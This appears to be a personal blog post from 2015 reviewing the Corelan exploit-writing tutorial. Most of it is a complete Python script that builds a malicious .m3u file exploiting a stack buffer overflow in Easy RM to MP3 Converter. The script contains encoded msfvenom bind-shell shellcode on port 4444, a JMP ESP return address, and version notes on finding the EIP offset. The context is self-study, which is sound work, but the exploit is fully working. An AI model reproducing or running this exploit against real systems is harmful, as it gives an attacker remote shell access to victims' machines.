Thursday, July 2, 2015

Reviewing Corelan Exploit Writing Part 1

I reviewed the exploit writing tutorial that Corelan makes available here.  After going through the tutorial I developed the following final script that will create the m3u file that overwrites the EIP with a JMP to ESP in the dlls of the Easy RM to MP3 Converter.  

My final script is below:

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb8\xdf\xd3\xa6\xb8\x3c\xa3\xc9\xe9\x93\xbf\x93\x29"
buf += "\x12\x13\xa8\x63\x0c\x70\x95\x3a\xa7\x42\x61\xbd\x61"
buf += "\x9b\x8a\x12\x4c\x13\x79\x6a\x89\x94\x62\x19\xe3\xe6"
buf += "\x1f\x1a\x30\x94\xfb\xaf\xa2\x3e\x8f\x08\x0e\xbe\x5c"
buf += "\xce\xc5\xcc\x29\x84\x81\xd0\xac\x49\xba\xed\x25\x6c"
buf += "\x6c\x64\x7d\x4b\xa8\x2c\x25\xf2\xe9\x88\x88\x0b\xe9"
buf += "\x72\x74\xae\x62\x9e\x61\xc3\x29\xf7\x46\xee\xd1\x07"
buf += "\xc1\x79\xa2\x35\x4e\xd2\x2c\x76\x07\xfc\xab\x79\x32"
buf += "\xb8\x23\x84\xbd\xb9\x6a\x43\xe9\xe9\x04\x62\x92\x61"
buf += "\xd4\x8b\x47\x1f\xdc\x2a\x38\x02\x21\x8c\xe8\x82\x89"
buf += "\x65\xe3\x0c\xf6\x96\x0c\xc7\x9f\x3f\xf1\xe8\x8e\xe3"
buf += "\x7c\x0e\xda\x0b\x29\x98\x72\xee\x0e\x11\xe5\x11\x65"
buf += "\x09\x81\x5a\x6f\x8e\xae\x5a\xa5\xb8\x38\xd1\xaa\x7c"
buf += "\x59\xe6\xe6\xd4\x0e\x71\x7c\xb5\x7d\xe3\x81\x9c\x15"
buf += "\x80\x10\x7b\xe5\xcf\x08\xd4\xb2\x98\xff\x2d\x56\x35"
buf += "\x59\x84\x44\xc4\x3f\xef\xcc\x13\xfc\xee\xcd\xd6\xb8"
buf += "\xd4\xdd\x2e\x40\x51\x89\xfe\x17\x0f\x67\xb9\xc1\xe1"
buf += "\xd1\x13\xbd\xab\xb5\xe2\x8d\x6b\xc3\xea\xdb\x1d\x2b"
buf += "\x5a\xb2\x5b\x54\x53\x52\x6c\x2d\x89\xc2\x93\xe4\x09"
buf += "\xf2\xd9\xa4\x38\x9b\x87\x3d\x79\xc6\x37\xe8\xbe\xff"
buf += "\xbb\x18\x3f\x04\xa3\x69\x3a\x40\x63\x82\x36\xd9\x06"
buf += "\xa4\xe5\xda\x02"

file = open("6crash.m3u", "w")
junk = "\x41"*26059
# Searched for jmp esp in all commands and found one without \x00 in the address
# Address for JMP ESP 0x01a8f23a - This address goes in as EIP
eip  = "\x3a\xf2\xa8\x01"
junk += eip
junk += "C"*4 # Offset to where the ESP points to
junk += "\x90" * 8
junk += buf
junk += "\x41" * (30000 - len(junk))

file.write(junk)
file.close()

# v1 Script
# Mounted a file share on a WinXPSP2 box
# Create the crash.m3u file and then send it over to the file share
# Open the file using the vulnerable Easy RM to MP3 Converter
# Crashes the application by overwriting the EIP register 

# v2 Script
# Created a pattern using pattern_create with metasploit
# ./pattern_offset.rb 42336a42
# [*] Exact match at offset 1059
# 25000 + 1059 = 26059 offset for the EIP address

# v3 Script
# Verify that at the offset where EIP is overwritten is the letter of B or \x42

# v4 Script
# We notice that Extended Stack Pointer points to where the C's
# However the offset to the first C we are not sure of
# Introduce a pattern of 20 bytes to find the offset

# v5 Script
# Identified that the offset to where the ESP points to is on the 5th byte of the pattern
# Substituted out the letter C in the pattern and then added C to compensate for the offset
# What is seen in ESP should start with the letter D in the pattern

# v6 Script
# Identify an instruction in another dll file that will do jmp esp
# Found a memory address of 0x01a8f23a
# Created shellcode and place where the pattern is located

All of the files that I created as I went through the tutorial are located on my drive located here.

No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...